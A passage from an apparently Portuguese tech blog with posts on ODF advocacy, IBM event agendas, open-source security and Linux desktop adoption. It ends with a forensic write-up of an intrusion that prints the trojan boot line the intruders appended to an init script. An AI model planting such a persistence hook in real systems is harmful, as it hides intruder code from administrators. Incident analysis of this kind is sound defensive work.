  • Kristian Kielhofner falou sobre o Asterisk. Muito interessante. Mas a maior sensação foi seu celular Nokia que suporta SIP. Ou seja, para qualquer contato de sua lista telefônica, ele pode fazer uma ligação normal (por GSM) ou por VoIP, gastando bytes de seu plano IP (mais barato) e economizando minutos de seu plano de voz (mais caro). Segundo ele, os aparelhos Nokia da linha E e N estão anos a frente de qualquer outro fabricante por sua integração com VoIP. Ele consegue rotear seu ramal do trabalho, ou seu telefone de casa para seu celular, não por followme, mas por IP — Nokia é o celular dos geeks. Mostrou também um gadget que parece um isqueiro com porta ethernet: trata-se de um computador com WiFi que tem 256MB de RAM e AstLinux já instalado, boota em segundos com Linux, Asterisk e um firewall, e lhe serve como uma central telefônica portátil para viagens.
  • Amauri Zavatin, da Caixa Econômica, impressionou todos contando como o banco social está aos poucos usando Linux em todos os lugares. Dentro de um ano, todos os terminais dos caixas e ATM serão thin clients Linux. BrOffice.org já está sendo massivamente usado, com ordem da presidência, e há prazo de 6 meses para desinstalar o MS Office. Intranet foi toda redesenvolvida em Java e Zope, e está servindo como piloto para a próxima Internet do banco. Diminuiram em 70% os gastos com impressão porque começaram a controlar seu uso com ferramentas open source. Des-terceirizaram todo o negócio das casas lotéricas (por causa das notícias de corrupção) redesenvolvendo todas as aplicações internamente com Java e Linux, e o projeto saiu por uma fração do que foi previsto. Etc etc etc. Esta palestra serviu como um termômetro do uso de Open Source de forma corporativa, responsável e séria.
  • Louis Suarez-Potts, da Collab.net, fez uma palestra emocionada sobre OpenOffice.org e ODF, convocando mais colaboradores para os diversos projetos atrelados ao OOo. Explicou que pode-se contribuir para a suite em sí, mas também para os subprojetos de marketing, empacotamento, artwork, testes, plugins e extensões.

O evento fechou com um coquetel informal onde reencontrei velhos amigos como o Luiz Blanes e outros.

A casa estava cheia, e espero que o evento se repita ano que vem. Tem tudo para se tornar tradição em São Paulo.

Um Tratado sobre Padrões Abertos e ODF

Bob Sutor, diretor da IBM que tem a missão de fomentar Padrões Abertos e Open Source no mercado, tem também a responsabilidade de comunicar a importância do OpenDocument Format (ou ODF).

Publicou em seu blog um pronunciamento feito ao congresso do estado do Texas, que está em fase de votar uma lei a favor da adoção do ODF. É um tratado edificante sobre a importância social e mercadológica dos Padrões Abertos (instanciados aqui no ODF). As idéias e raciocínio deste documento podem ser facilmente adaptados para serem ouvidos por qualquer orgão governamental, instituição pública ou privada do Brasil também, quanto mais agora devido a criação da nossa própria Aliança ODF.

Eis uma tradução integral:

2007/04/09: Revisada a tradução, a semântica, sintaxe e gramática por Tatiana Cymbalista.

Boa tarde/noite, Sr. Presidente e membros do Comitê. A IBM apóia este projeto de lei. Este projeto de lei trata do futuro, de mais concorrência e inovação e de dar mais opções para o Texas. É completamente consistente com a direção tecnológica e de propriedade intelectual da indústria do software.

Os atuais formatos de arquivos nos quais alguém grava documentos de escritório, usados pela maioria dos senhores e de seus cidadãos, são baseados em tecnologias e práticas dos anos 70, 80 e 90, pelas quais algumas companhias “prendiam” clientes a seus produtos e atualizações. Isso não é mais aceitável hoje em dia.

Quando os senhores e seus cidadãos encontram-se realmente restritos a um único fornecedor de software para acessar informações governamentais, vocês e eles pagam o que eu considero taxas. Padrões abertos evitam isso.

A primeira taxa é a diferença entre o que você precisa pagar para aquele fornecedor versus o custo mais baixo que pagaria se múltiplos fornecedores existissem e os preços tivessem que ser competitivos. Você também teria que pagar uma taxa de inovação. O fornecedor único tem motivos limitados para melhorar o produto. Idéias refrescantes de atores novos como os empreendedores do Texas, são mantidas fora da categoria do produto. Isso é ruim.

Aqueles que são contrários a este projeto de lei estão, em essência:

  • confortáveis em ter um único fornecedor;
  • satisfeitos com as políticas de licitação que permitem haver um único fornecedor de software de documentos para o governo;
  • razoavelmente felizes em pagar as taxas financeiras e de inovação acima.

A IBM não se contenta com este status quo. Nem os autores desse projeto de lei. Nem a maioria das indústrias; aquelas nas áreas de ciências naturais, educação, saúde, e assim por diante, que estão tendendo para padrões abertos. Com o advento da Internet, beaseada em padrões abertos como HTML, o valor dos padrões abertos reais tem sido comprovado.

Pensem sobre quão mais fácil, mais acessível, mais transparente é para vocês colaborar dentro do governo e se conectar com seus cidadãos graças à Internet e ao correio eletrônico, a blogs e a tudo aquilo que surgiu a partir de padrões abertos. É chegada a hora de levar esse poder de colaboração aos documentos e abri-los, dando controle aos governos e escolha aos cidadãos.

A IBM se juntou aos nossos colegas da indústria para trabalhar em um padrão aberto para formatos de arquivos, chamado de OASIS/ISO OpenDocument Format (ODF). Formatos de arquivos são meras especificações de como um documento é estruturado — cabeçalhos, rodapé, parágrafos — e de como ele deve ser salvo e intercambiado. O formato OpenDocument tem sido desenvolvido aberta e ativamente por uma comunidade global de especialistas de muitas organizações e tem sido amplamente implementado por vias independentes, tanto de código fonte aberto como proprietário.

Sua taxa de adoção está aumentando. Adolescentes estão usando-o. Políticos estão usando-o. Alguns diretores de tecnologia em organizações que oficialmente só usam formatos proprietários estão usando ODF em casa, quando chega a hora de gastar seu próprio dinheiro e experiência técnica para escolher produtos para seu uso pessoal. A enorme e crescente base de usuários de Open Office está gravando e distribuindo arquivos em formato ODF. A próxima geração do Lotus Notes da IBM irá suportá-lo ainda este ano.

Então por que vocês precisam de legislação sobre isso ?

Primeiro, porque o Texas, como um estado soberano e uma potência no mercado de TI, deve, na minha opinião, ser capaz de fazer o que bem entender com os documentos de escritório que cria. Isso se aplica aos documentos de hoje, mas também aos documentos que serão criados amanhã e que serão os registros históricos daqui a cinqüenta anos. Vocês têm a oportunidade de claramente afirmar a posição de que o Texas não será refém de nenhum fornecedor para acessar as informações do próprio estado.

Segundo, porque as mudanças estão acontecendo agora e os usuários vão, ao longo do tempo, usar novas aplicações com novos formatos de arquivos baseados em documento. Eu nunca encontrei um diretor de tecnologia ou pessoa da área de finanças que me dissesse que nunca usará um novo software. Então, uma encruzilhada aproxima-se rapidamente e vocês precisam fazer uma escolha: escolher um único fornecedor e pagar essas taxas que mencionei, ou adotar formatos de documentos verdadeiramente abertos, que não são ditados por um único fornecedor, fomentam competição e inovação de várias origens e provêm verdadeira escolha de provedores e seus produtos.

Eu posso garantir que o software que teremos em cinqüenta anos vai funcionar de formas radicalmente diferentes e será fornecido por provedores completamente diferentes dos que conhecemos hoje. Devemos manter nossas opções abertas e, felizmente, com ODF temos uma excelente escolha comparada com qualquer alternativa. Além do mais, pessoalmente, eu apostaria na “inteligência das massas”, na coletividade de experts em TI que verdadeiramente domina padrões abertos e poderá nos preparar para o sucesso nos próximos anos. Depender de um único fornecedor para otimizar as ferramentas de seu próprio sucesso é solução do passado.

Em terceiro lugar, para ser claro, QUALQUER UM pode implementar um padrão aberto. Esse projeto de lei trata de escolha. ODF e padrões abertos para formatos de arquivos fomentam escolha de aplicações, usos inovadores da informação, mais competição e queda de preços. Pessoalmente, eu acho que essas coisas são boas.

Em conclusão, o mundo está se deslocando para padrões abertos, não-proprietários, baseado no incrível sucesso da Internet, um sucesso que foi bem mais importante do que a posição de mercado de um único fornecedor ou as suas idéias sobre o que seria correto para o mundo.
Nós podemos fazer isso novamente, mas temos que fazê-lo com cuidado. O Estado do Texas está em posição de mostrar aos seus cidadãos e ao mundo que esse sucesso pode ser repetido e que pretende liderar esse processo. O Texas pode mostrar que a frase “padrão aberto” significa mais do que um departamento de marketing de uma empresa diz que é.

Sr. Presidente e membros do comitê, padrões abertos de documentos são a apólice de seguro para seus documentos, em oposição ao risco de perda de documentos históricos esperando para acontecer. Eu vos agradeço pela oportunidade de testemunhar a favor do projeto de lei, e estou a disposição para responder a qualquer dúvida que tiverem.

Mapas Personalizados no Google Maps

Confira o novo Google Maps, que já era na minha opinião o serviço mais prático e legal da Internet.

A partir de hoje (não lembro de ter visto isso ontem) pode-se criar mapas personalizados com marcadores coloridos e balões com informações formatadas, como este mapa com legendas de Paraty e região.

Além do mais, pode-se exportar essas informações para um arquivo KML, importável no Google Earth. Mas como KML é um idioma XML aberto, pode-se usa-lo como meta informações geográficas em quaisquer outras aplicações. A imaginação do desenvolvedor de aplicações é o limite. Discretamente, KML irá se tornar um padrão aberto e universal para descrever metainformações em mapas.

Havia desenvolvido um plugin para WordPress (ou qualquer outro sistema de blog, ou página simples) para embarcar mapas interativos dentro de posts, capaz de incrementar posts como este (na verdade, a maioria de meus posts sobre viagens tem mapas interativos). Ele ainda é muito prático, porque a API do Google Maps ainda não provê um serviço para desenhar os novos mapas personalizados fora do próprio Google Maps. Mas duvido que isso demore a acontecer, e quando acontecer, das duas uma: ou o plugin vai ficar muito mais simples, ou ele vai se tornar completamente obsoleto.

Eu sou tão fascinado por mapas que provavelmente fui um cartógrafo em outra encarnação.

E para quem não sabe, o Google Maps e o GMail são os sites populares que primeiro usaram os conceitos de AJAX.

Evento de Virtualização da Novell

Novell Virtualization Tour

Não podemos deixar de marcar nossa presença no evento de virtualização da Novell. Confira as datas e cidades:

Brasil América Latina

No track da IBM vou fazer uma apresentação nova sobre virtualização, incluindo o tema quente da paravirtualização, mas passando também por virtualização de storage, virtualização de aplicações, e outras virtualizações pouco conhecidas, até chegar nos conceitos de Grid e SOA que são as vertentes mais sofisticadas de virtualização.

Inscreva-se gratuitamente nos links acima e garanta sua vaga.

ODF Alliance in Brazil

Yesterday was announced the ODF Alliance Chapter Brasil, being the fourth country to create this initiative, after US, India and Poland.

The founder members are the Brazilian offices of IBM, Red Hat and Sun. Jomar Silva, the director, told me this:

My understanding is that the Brazilian [ODF Alliance] operation has the mission to execute the work proposed by the ODF Alliance in our country. We are partners and fight together the same battle, exchanging experiences (and this is a very important point) so lessons learned with migration and adoption of ODF in other countries (governments and companies) may be used here.

Many software support today reading and writing of documents in the OpenDocument format, being OpenOffice.org the most popular. The user gains freedom of choice, becomes able of negotiation, and can choose for the best price-benefit performance. This user-suppliers dynamics works as a fuel for innovation.

ODF, being based on open standards as XML, plus having a free license, plus to be already and ISO standard (two steps ahead of OOXML, proprietary competitor by Microsoft), is a mark in IT’s history, when for the first time the user is truly the independent owner of his documents. This is simply a very powerful idea.

The Brazilian chapter of the ODF Alliance will focus, in its first days, to setup its web site — probably at www.br.odfaliance.org —, and to define policies to accept new members as companies, institutions, user groups and communities.

ODF Alliance, Capítulo Brasil

Foi anunciada ontem para a mídia a ODF Alliance – Chapter Brasil. Somos o terceiro país no mundo que criou esta iniciativa, depois da Polônia e da Índia.

Tem como membros fundadores as sucursais brasileiras da IBM, Red Hat, Sun e Jomar Silva como diretor, que me contou o seguinte:

Eu entendo que a operação brasileira tem como missão e papel realizar o trabalho proposto pela ODF Alliance em território brasileiro. Somos todos parceiros e lutamos juntos a mesma batalha, trocando experiências (e este é um ponto muito importante) para que as lições aprendidas com a migração e adoção do ODF por outros países (governos e empresas) possam ser utilizadas aqui.

Diversos softwares já oferecem hoje suporte de leitura e escrita de arquivos no formato OpenDocument, sendo o mais conhecido a universal suite OpenOffice.org. O usuário então ganha com isso liberdade de escolha, poder de negociação, e poder optar pela melhor relação custo-benefício. Essa dinâmica usuário-fabricantes funciona como combustível para a inovação.

ODF é um patrimônio de seus usuários e da humanidade. Baseado em padrões abertos como XML, somado aos fatos de ter uma licensa de uso livre, e de já ser um padrão ISO (dois passos à frente do OOXML, concorrente proprietário da Microsoft), assinala um marco na história da TI onde pela primeira vez o usuário é verdadeiramente dono independente de seus próprios dados, garantindo assim sua longevidade e interoperabilidade. É simplesmente uma idéia muito poderosa.

O ODF Alliance – Chapter Brasil tratará, em seus primeiros dias de vida, de levantar seu site em português — provavelmente em www.br.odfalliance.org —, e em definir critérios para receber novos membros, como empresas, instituições, grupos de usuários e comunidades.

Inclusão Digital

Já posso desencarnar feliz porque tenho um blog popular.

Meu post sobre Aquecimento Global é o campeão de audiência com 246 comentários neste exato momento, mas se você for verificar agora, o número já deve ter crescido. Até o final do ano deve facilmente chegar a 400 comentários.

Escrito numa noite mal dormida, de pesadelos, após ter assistido o filme do Al Gore, nunca tinha imaginado que seria tão visitado, e nem por esse tipo de público: a maioria são estudantes fazendo trabalho para a escola.

Uma conhecida que corrige redações de vestibular me disse uma vez que o nível dos textos é muito baixo. Confesso que achei que ela estava exagerando e sendo pessimista demais, mas minha opinião mudou depois do meu post popular.

Veja alguns comentários ali:

E a lista não pára…

A inclusão digital está acontecendo mais rápido do que qualquer outra inclusão.

Aproveitando, meus outros posts populares são o de download de música, o do Google Maps para WordPress, e o do tema do meu blog.

IBM no Oracle Open World

A IBM vai participar do evento Oracle Open World, nos dias próximos dias 27, 28 e 29 de março.

Local

Transamérica Expo Center, São Paulo.

Agenda

Parceiros, Cezar Taurion, outros especialistas da IBM e também eu, vamos mostrar casos de sucesso e novas idéias sobre diversos assuntos, inclusive Linux, Service Oriented Architecture, Padrões Abertos, Software as a Service, novidades nas plataformas de hardware da IBM etc. Confira a agenda:

Dia 27/03

11h00 – 11h40 System p (Unix) para Soluções Oracle

Conheça a tecnologia POWER IBM, com todo poder de processamento e capacidades avançadas de virtualização e alocação dinâmica de recursos. Ideal para empresas com missão crítica e com necessidades de flexibilização da sua área de TI, além de ser uma combinação perfeita com diversas soluções Oracle.

Palestrante: Mauro Minomizaki

11h45 – 12h15 Caso de sucesso – Unilever: Buscando a excelência através da implementação de ITIL

Com a implementação dos processos ITIL suportados pelo Siebel, a área de IT da Unilever Latin America busca consolidar sua excelência operacional para entregar aos seus clientes um serviço cada vez melhor.

Palestrante: José Ferroli (Unilever)

14h00 – 14h40 Modelos de negócio para padrões abertos e open source

A importância dos Padrões Abertos para a indústria e sociedade. Como empresas estão tirando vantagem disso. Modelos de negócios para Open Source, e como escolher entre Open Source e Closed Source.

Palestrante: Cesar Taurion (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma lexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: MPL

Soluções para empresas em que a performance dos projetos e gerenciamento dos riscos são críticos. Controle os custos de seus projetos em tempo real.

Palestrante: MPL

16h10 – 16h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h40 – 17h20 IBM Service Management for Oracle Applications – Oracle Optimization and Management

O IBM Service Management alavanca as práticas ITIL para reduzir tempo, custo e risco na entrega e gerenciamento de aplicações Oracle em ambientes heterogêneos, ajudando as empresas a reduzir o custo total de suas operações e a liberar os orçamentos para investimentos em inovação.

Palestrante: Jorge Cordenonsi

17h20 – 18h00 Por que Oracle no mainframe?

A Oracle e a IBM anunciaram em Outubro de 2006 uma forte parceria de aplicativos e Banco de Dados em plataforma mainframe – System z. Além disso, algumas dessas tecnologias já estão rodando em ambiente Linux do mainframe, com um ótimo TCO para clientes que buscam consolidação.

Palestrante: Roberto Santos (IBM)

18h00 – 19h00 Coquetel System z

Dia 28/03

11h00 – 11h40 Soluções Mid-Range de Storage para Oracle

Conheça as soluções voltadas ao mercado de pequenas e médias empresas, onde o volume de dados vem crescendo a cada dia. Além disso, veja os diferenciais com soluções Oracle e os últimos lançamentos voltados para esse mercado.

Palestrante: Wellington Menegasso

14h00 – 14h40 Sizing de Infraestrutura para Soluções Oracle

Veja como a IBM investe fortemente em seu Centro de Competência, bem como na ferramenta de sizing, garantindo o bom funcionamento do seu processo e trazendo economia às empresas, além de ser uma ótima oportunidade aos nossos parceiros de negócios.

Palestrante: Guilherme Araujo (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma flexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: HB Global

Soluções JD Edwards Oracle para Transporte e Logísitica

Palestrante: HB Global

16h00 – 16h30 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h30 – 17h10 Soluções Siebel com plataforma Unix IBM

Conheça as funcionalidades de nossa plataforma System p (UNIX) com o aplicativo Siebel Oracle, mostrando todo o valor agregado e benefícios que as empresas podem ter optando por essa solução.

Palestrante: Eduardo Pacini (IBM) e Sérgio Saldanha (Oracle)

17h20 – 18h00 Power Net – um programa direcionado para ISVs

PowerNet é um programa voltado a desenvolvimento de novos ISVs na plataforma System p. Venha conhecer todos os benefícios do programa e como a IBM está trabalhando com a Oracle. Extremamente focado para parceiros de negócios.

Palestrante: Marcelo Violento (IBM) e Sérgio Saldanha (Oracle)

18h00 – 19h00 Coquetel System p

Dia 29/03

11h00 – 11h40 Bladecenter com Soluções Oracle

Cada vez mais as empresas enfrentam problemas como redução de custos na área de TI, falta de espaço, problemas de refrigeração do seu CPD e gerenciamento de parques de servidores. O BladeCenter IBM pode resolver todos esses problemas com sua capacidade de

Palestrante: Ana Paula Tran

11h45 – 12h15 Caso de sucesso: Como atingir a otimização de processos com redução de custos e redução do número de transações de documentos em até 50%.

Melhoria do gerenciamento de risco, redução das complicações relacionadas a impostos e legais, melhoria da qualidade dos dados, maior cooperação dos empregados, otimização das ações da corporação, com maior rapidez nas soluções de possíveis dificuldades a

Palestrante: CVRD

14h00 – 14h40 A melhor distribuição Linux

Entenda o que são distribuições Linux, como estão posicionadas no mercado e na comunidade, as mais importantes, vantagens e desvantagens de cada uma, e como escolher a melhor para o seu negócio.

Palestrante: Avi Alkalay (IBM)

14h50 – 15h30 System i e JD Edwards: a combinação perfeita

Conheça a plataforma ideal para a solução de JD Edwards, o System i, dotado de tecnologia POWER. Possui alto poder de processamento, capacidades avançadas de virtualização e alocação dinâmica de recursos, além de ser uma máquina totalmente auto gerenciáve

Palestrante: Mauricio Conceição (IBM)

15h40 – 16h20 Otimize seu datacenter tirando o máximo de seu hardware

Conheça arquiteturas não-convencionais, mas que trazem benefícios financeiros enormes, para
virtualização, enjaulamento de aplicações, desktops multiusuários, clusters de alta disponibilidade, de custo baixo até os mais escaláveis, clusters para Grid e alta disponibilidade, e opções para desktop.

Palestrante: Avi Alkalay (IBM)

16h30 – 17h00 Parceiro: YKP

Conheças as Soluções CRM integradas ao JD Edwards

Palestrante: YKP

17h10 – 17h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

Estando no evento, não deixe de passar no stand da IBM.

Segurança em Open Source

Cezar Taurion, excelente consultor e colega de trabalho, engatou seu blog no developerWorks. Gostaria de complementar seu artigo da Linux Magazine de dezembro de 2006 com algumas aspectos sobre segurança.

Não há como afirmar que Open Source é mais seguro que Closed Source, ou que Closed Source é mais seguro que Open Source. Quem o afirma, geralmente faz por religião e não por análise fria.

Considero-me especialista em segurança, mas evito ao máximo tocar neste assunto ao falar com clientes em geral, quando o âmbito é Open Source. Só quando eles perguntam. Simplesmente porque cada um terá uma opinião, e porque nehuma opinião pode ser verdadeiramente constatada.

Vamos dividir o mundo Open Source em dois blocos. No primeiro desfilam as escolas do grupo 1, campeões de audiência como o Apache HTTP Server, Samba, boa parte do Kernel, Bind, OpenSSH, DHCP, Firefox, OpenOffice.org, libc, que são arrasadoramente populares, e literalmente seguram a festa da Internet no ar. A lista não é muito maior que essa.

E no grupo 2 ficam todos os outros projetos Open Source, disputando um lugar ao sol e na passarela das distribuições Linux. Aqui estão as dezenas de milhares de projetos abandonados do SourceForge.net, e também projetos longe da criticidade das do grupo 1, mas já um pouco mais usados, como Gnome, KDE, X.org, a outra parte do Kernel, OpenLDAP, NAS, VNC, ImageMagick, Bash, Gimp, Kopete, Gaim, libc++, libxml, ntp, e mais todo o resto que não aparece no grupo 1 mas que está instalado aí no seu computador.

Enquanto pensamos que no closed source podem haver pontos inacessivelmente inseguros e backdoors, devemos também nos perguntar se há realmente pessoas analisando todo Open Source que interessa, com enfoque em segurança. Pense no grupo 2.

Sobre segurança em Open Source, a única coisa que podemos afirmar é que o código se mantém aberto para quem quiser auditá-lo (característica que o closed source não tem e nem quer ter). Mas novamente, isso não é garantia de que suas falhas serão achadas.

No grupo 1, dos superpopulares, a estória é outra. Eles são naturalmente submetidos a stress massivo e constante do mundo real. E a dependência que muitas empresas e indivíduos tem desse grupo os leva a se relacionar de forma simbiótica com sua evolução. Usam o fato de ter o fonte disponível para auditar e contribuir melhorias.

A separação entre os grupos não é tão nítida. Usei só para ilustrar. A fronteira é na verdade uma larga faixa de projetos Open Source com diferentes graduações de popularidade, stress e uso.

É preciso ter a soma de dois aspectos para se ter a melhor segurança: código fonte aberto + extrema popularidade, sendo o último mais importante (e mais difícil de alcançar) que o primeiro.

Um closed source também tem sua chance de ser seguro. Basta a empresa que o fabrica cuidar bem de seu produto. Se ele for popular, ela tende a cobrar menos para executar este trabalho. Se for menos popular, mas ainda desejado pelos clientes, seu preço tende a ser mais alto.

O nabo é dos NETs

Complementando a estória do Antônio “LedStyle” Cláudio, eu tenho NET de 200kbps em Higienópolis. É tão bom quanto 200kpbs conseguem ser.

Mas quero aumentar a velocidade, e depoimentos como o dele dão medo. O pior de tudo é o atendimento péssimo das centrais dessas prestadoras. E o serviço é bem caro, mas vamos dizer que atribuo isso ao fato de que custo de banda core no Brasil é caríssimo.

Diga-se de passagem, meu pai colocou 2mbps em casa, com NET Fone. Ele fez uma análise meticulosa das tarifas de ligação telefônica comparando outras operadoras, e disse que o preço do minuto NET é bem mais caro. A NET diz que é mais barato. Bem, isso é uma meia verdade, somente em alguns horários, para ligações locais muito curtas. Como diz o ditado, uma meia verdade é uma mentira.

Antes eu tinha o Giro, da Vesper/Embratel. 300kbps de baixa qualidade que vinham através de um modem sem fio que usava a infraestrutura CDMA da Vesper, e era conectado por USB no computador, e tinha suporte ruim para Linux.

Por ironia do destino, o atendimento telefônico do Giro da Vesper era ótimo. Atendentes sinceros, com bom conhecimento técnico e que retornavam ligações depois de fazer análises bem feitas. Fiz questão de registrar isso quando infelizmente cancelei o serviço porque sua tecnologia não me atendia.

OSDL Linux Client Survey Analysis is Out

On January 25th the OSDL released their 2006 Linux client survey analysis, which identified the following barriers for Linux deployment on desktops:

  1. Application availability
  2. Quality of peripheral support
  3. End user training
  4. Desktop management issue

It is not that applications don’t exist for the Linux desktop, but users grow accustomed to certain applications that they just can’t live without.

Users report they are missing applications as Microsoft Office (OpenOffice.org is the alternative), Adobe Photoshop (which has The Gimp as the closest, but still far alternative), AutoCAD (with QCad as a very far similar) and others.

For peripherals, this is the list:

  1. Printers
  2. Personal storage devices (i.e. USB memory)
  3. Scanners
  4. Digital cameras
  5. Mail and messaging devices
  6. Web cam / video
  7. Smartphones

However, it is still difficult to buy a printer at your local electronics store and expect it to work out of the box on a Linux machine. While most printers are supported on Linux, there is still a lag from the time when a printer hits the market to when the driver driver is available and automatically installed on your computer by a commercial distro update.

And as a Linux user, I must add that when the device works, it usually won’t work with its full set of capabilities, because drivers are usually written by third parties on the OSS world – and not by their manufacturers, which are expected to have a much deeper knowledge (and project commitment) on these hardware capabilities.

So the problem is a committed application and drivers development. Well, how can companies commit themselves to develop desktop software (which means friendly to non-technicall users) in a world that had not decided yet about some elementary standards? Yes, there is the FreeDesktop.org initiative but the standards they are focused on are more related to KDE-Gnome interoperability.

Most important standards that must be defined will find their home in a layer bellow: LSB. But unfortunately, the Linux Standard Base still has a big job to finish and still seems to have difficulties to catch up with ISVs.

As an example, there is no de facto standard defined for things as trivial as a configuration files format for the whole system, not only for desktop apps. This is particularly important because configurations are what makes software run in a specific way. They are the soul of any software (while code is the body). A popular standard for configurations will provide ways for any software to collaborate with, and auto-configure any other software. On Windows, this was successfully achieved with its registry. On Linux, similar but broader and better alternatives exist (as the Elektra Initiative), but this is a subject that seems to not inspire the OSS community.

Standards bodies can’t do everything alone. The community must be ready for changes, adaptations, and have courage to throw away code that was not choosed by the standard, and start focusing on what was selected to be part of it. Courage to stop reinventing the wheel. For example, on a vanilla KDE installation you will find about 4 different media players (Amarok, Juk, kboodle, noatun, etc) and 3 different plain editors (kate, kedit, kwriter). If you have Gnome installed on same system, add a few more to each class of applications (and to the icons that will appear on your menus). This is confusing, fat and bad.

Another important fact on the analysis is a 49% desktop share for Canonical’s Ubuntu Linux, against RHEL and SLED with 16% each. RHEL and SuSE are more popular on servers and are essentially and structurally different distributions, but both use RPM as their packaging system. While Ubuntu is radically different from both, based on Debian, with the DEB format for packages. A well known and well used packaging system is very important on a desktop world, because this is what guarantees an easy, painless software installations and upgrades. So if I am an ISV with limited technicall staff and time resources, how should I package my software for easy deployment? DEB or RPM? If RPM, should I focus on Red Hat or SuSE flavors? Though questions.

Application vendors cannot afford to develop, distribute, and support applications across a fragmented Linux market.

Red Hat and Novell should look at their future server market, paying attention on what is happening today on the desktop. History shows that people tend to bring to work (and to servers) what they like and use on their desktops at home. This is Ubuntu’s long term strategy and they seem to be succeeding, at least on their first phase.

Na Trilha do Invasor

Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.

Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.

Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.

Os Rastros Deixados pelo Cracker

O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:

Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:26:27 sshd[PID]: refused connect from  IP.IP.IP.IP

Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.

Histórico do Ataque

Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.

A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.

Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:

bash$ rpm -qf /etc/init.d/functions
initscripts-7.93.20.EL
bash$ rpm -V initscripts
S.5....T c /etc/rc.d/init.d/functions

Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.

Mas o que foi alterado no script functions ?

A última linha do script era esta:

/usr/bin/crontabs -t1 -X53 -p

Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:

bash$ rpm -qf /usr/bin/crontabs
o ficheiro /usr/bin/crontabs não pertence a nenhum pacote

